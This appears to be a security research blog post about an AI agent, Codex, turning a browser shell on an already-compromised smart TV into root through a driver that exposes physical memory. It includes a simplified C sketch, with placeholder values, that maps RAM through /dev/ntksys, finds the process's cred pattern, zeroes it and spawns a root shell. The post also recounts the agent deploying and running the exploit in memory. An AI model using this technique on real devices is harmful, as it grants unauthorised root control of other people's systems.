That gave Codex a safe, known-good physical page to test against. It then wrote a second helper to answer the more dangerous question: if it registered that physical address through ntksys, could it really map the page into user space and read or write it from the browser shell? The answer was yes. Before that result, the issue was still a source-backed theory; after it, Codex had shown that an unprivileged process on the TV could read and write a chosen physical page. The remaining question was which kernel object to corrupt.

The exploit did not come from us. We never told Codex to patch cred, never explained what cred was, and never pointed out that the browser process’s uid=5001 and gid=100 would make a recognizable pattern in memory. Codex chose that target itself, and the choice followed directly from the primitive it had already proven.

For anyone who does not spend time in Linux internals, cred is the kernel structure that stores a process’s identities: user ID, group ID, and related credential fields. If you can overwrite the right cred, you can change who the kernel thinks the process is. Once Codex had arbitrary physical-memory access, the remaining plan became straightforward: scan the RAM windows recovered from /proc/cmdline, look for the browser process’s credential pattern, zero the identity fields, and then launch a shell.

The live shell had given Codex the identity values, the source audit had given it the primitive, the early helpers had proven that primitive, and the final exploit connected those pieces without needing any elaborate kernel control-flow trick. By the time we reached the final run, the hard parts were already in place. We had the surface, the primitive, the deployment path, and the exploit.
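To make the shape of that exploit concrete, here is a heavily simplified sketch of a data-only cred overwrite through a physmap-style device node. It is not the exploit from the session: the ioctl number, the request layout, and the RAM window below are hypothetical placeholders, not values from the device.

    /* Heavily simplified sketch of the data-only escalation described above,
     * NOT the exploit from the session. The ioctl number, request layout, and
     * RAM window are hypothetical placeholders. */
    #include <fcntl.h>
    #include <stdint.h>
    #include <stdio.h>
    #include <string.h>
    #include <sys/ioctl.h>
    #include <sys/mman.h>
    #include <unistd.h>

    #define NTKSYS_SET_MEM_INFO 0x40085300u   /* HYPOTHETICAL ioctl request */
    struct st_sys_mem_info { uint32_t u32Start, u32Size; };

    #define WIN_PHYS 0x80000000u   /* HYPOTHETICAL RAM window from /proc/cmdline */
    #define WIN_SIZE 0x01000000u   /* scan 16 MiB of it at a time */

    int main(void)
    {
        int fd = open("/dev/ntksys", O_RDWR);
        if (fd < 0) { perror("open ntksys"); return 1; }

        /* Register an attacker-chosen physical range in table slot 0. */
        struct st_sys_mem_info info = { .u32Start = WIN_PHYS, .u32Size = WIN_SIZE };
        if (ioctl(fd, NTKSYS_SET_MEM_INFO, &info) < 0) { perror("ioctl"); return 1; }

        /* The mmap offset selects the slot; the driver maps the raw physical range. */
        uint32_t *mem = mmap(NULL, WIN_SIZE, PROT_READ | PROT_WRITE,
                             MAP_SHARED, fd, 0 /* slot 0 */);
        if (mem == MAP_FAILED) { perror("mmap"); return 1; }

        /* struct cred lays out uid,gid,suid,sgid,euid,egid,fsuid,fsgid as
         * consecutive 32-bit IDs, so the browser's 5001/100 identity repeats
         * four times in a row - that is the recognizable pattern. */
        const uint32_t pat[8] = { 5001, 100, 5001, 100, 5001, 100, 5001, 100 };
        for (size_t i = 0; i + 8 <= WIN_SIZE / 4; i++) {
            if (memcmp(&mem[i], pat, sizeof(pat)) == 0) {
                memset(&mem[i], 0, sizeof(pat));   /* all-zero IDs == root */
                printf("patched candidate cred at phys 0x%lx\n",
                       (unsigned long)(WIN_PHYS + i * 4));
            }
        }

        if (getuid() == 0)                         /* our own cred was among them */
            execl("/bin/sh", "sh", (char *)NULL);
        return 0;
    }

The only device-specific ingredients would be the physical windows recovered from /proc/cmdline and the 5001/100 identity pair; the rest is the generic scan-and-zero pattern the post describes.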
The last human prompt was:

“yeah okay try to check if it works”

Codex pushed the final chain through the controller path, had the TV fetch it, ran it through the in-memory wrapper, and waited for the result. It worked: the browser shell was now root.

By that point, the chain had already gone through surface selection, source audit, live validation, PoC development, target-specific build handling, remote deployment, execution under memfd, iterative debugging, and finally the credential overwrite that turned the browser shell into root.

In the course of driving Codex to the final destination, there were moments when it would definitely have gone off-track if we had not steered it back immediately. Here are some of those real interactions:

“bro, when you overwrite the args count, wouldn’t the loop just go wild?”
“bro can you just like, send it to the server, build it, and use the tmux shell to pull it down and run it for me? Why *** do you tell me to do *** bro, that’s your job bro.”
“the is not the TV, it is where the shell lives bro.”
“what *** you did man? the tv froze”
“Bro what did you do before you just replicate it now? why so hard?”

Honestly, this makes it even more realistic than we thought. At times, it was a one-shot success, and at other times, you really need to build that real interaction with Codex. This couldn’t have completed if we were treating it like a soulless bug-finding and exploit-developing machine!

What made the session worth documenting was the shape of the loop itself. We set up a control path into a compromised TV, gave it the matching source tree and a way to build and stage code, and from there the work became a repeated cycle of inspection, testing, adjustment, and rerun until the browser foothold turned into root on the device.

This experiment is part of a larger exercise. The browser shell wasn’t magically obtained by Codex. We had already exploited the device to get that initial foothold. The goal here was narrower: given a realistic post-exploitation position, could AI take it all the way to root?

The next step is obvious (and slightly concerning): let the AI do the whole thing end-to-end. Hopefully it’ll stay trapped inside the TV forever, quietly escalating privileges and watching our sitcoms.

...

Read the original on blog.calif.io »
